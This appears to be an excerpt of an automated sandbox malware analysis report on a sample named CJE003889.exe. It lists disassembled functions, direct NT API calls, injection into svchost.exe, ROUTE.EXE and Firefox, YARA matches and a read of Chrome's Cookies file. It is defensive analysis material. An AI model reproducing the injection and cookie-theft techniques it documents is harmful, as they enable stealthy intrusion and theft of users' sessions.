                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04A80 mov eax, dword ptr fs:[00000030h]1_2_03C04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]1_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]1_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30AD0 mov eax, dword ptr fs:[00000030h]1_2_03B30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]1_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]1_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]1_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]1_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA24 mov eax, dword ptr fs:[00000030h]1_2_03B6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EA2E mov eax, dword ptr fs:[00000030h]1_2_03B5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBCA11 mov eax, dword ptr fs:[00000030h]1_2_03BBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]1_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]1_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEA60 mov eax, dword ptr fs:[00000030h]1_2_03BDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]1_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]1_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov esi, dword ptr fs:[00000030h]1_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]1_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]1_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]1_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]1_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]1_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]1_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]1_2_03BBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B649D0 mov eax, dword ptr fs:[00000030h]1_2_03B649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03BFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC69C0 mov eax, dword ptr fs:[00000030h]1_2_03BC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04940 mov eax, dword ptr fs:[00000030h]1_2_03C04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB892A mov eax, dword ptr fs:[00000030h]1_2_03BB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC892B mov eax, dword ptr fs:[00000030h]1_2_03BC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC912 mov eax, dword ptr fs:[00000030h]1_2_03BBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]1_2_03B28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]1_2_03B28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]1_2_03BAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]1_2_03BAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]1_2_03BD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]1_2_03BD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC97C mov eax, dword ptr fs:[00000030h]1_2_03BBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]1_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]1_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]1_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]1_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E mov edx, dword ptr fs:[00000030h]1_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]1_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0946 mov eax, dword ptr fs:[00000030h]1_2_03BB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C008C0 mov eax, dword ptr fs:[00000030h]1_2_03C008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC89D mov eax, dword ptr fs:[00000030h]1_2_03BBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30887 mov eax, dword ptr fs:[00000030h]1_2_03B30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03B6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03B6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03BFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03B5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov ecx, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CB80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00CB80A9
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C8A155
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8A124 SetUnhandledExceptionFilter,0_2_00C8A124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEThread register set: target process: 6404Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEThread APC queued: target process: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeJump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3081008Jump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CB87B1 LogonUserW,0_2_00CB87B1
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C63B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C63B3A
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C648D7
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC4C53 mouse_event,0_2_00CC4C53
                Source: C:\Users\user\Desktop\CJE003889.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CJE003889.exe"Jump to behavior
                Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CB7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00CB7CAF
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CB874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00CB874B
                Source: CJE003889.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: CJE003889.exe, mcPAaApkdo.exe, 00000005.00000002.3491589842.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000000.2065781217.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215830760.0000000000EC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: mcPAaApkdo.exe, 00000005.00000002.3491589842.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000000.2065781217.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215830760.0000000000EC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: mcPAaApkdo.exe, 00000005.00000002.3491589842.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000000.2065781217.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215830760.0000000000EC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: mcPAaApkdo.exe, 00000005.00000002.3491589842.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000000.2065781217.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215830760.0000000000EC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8862B cpuid 0_2_00C8862B
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C94E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00C94E87
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CA1E06 GetUserNameW,0_2_00CA1E06
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C93F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00C93F3A
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C649A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
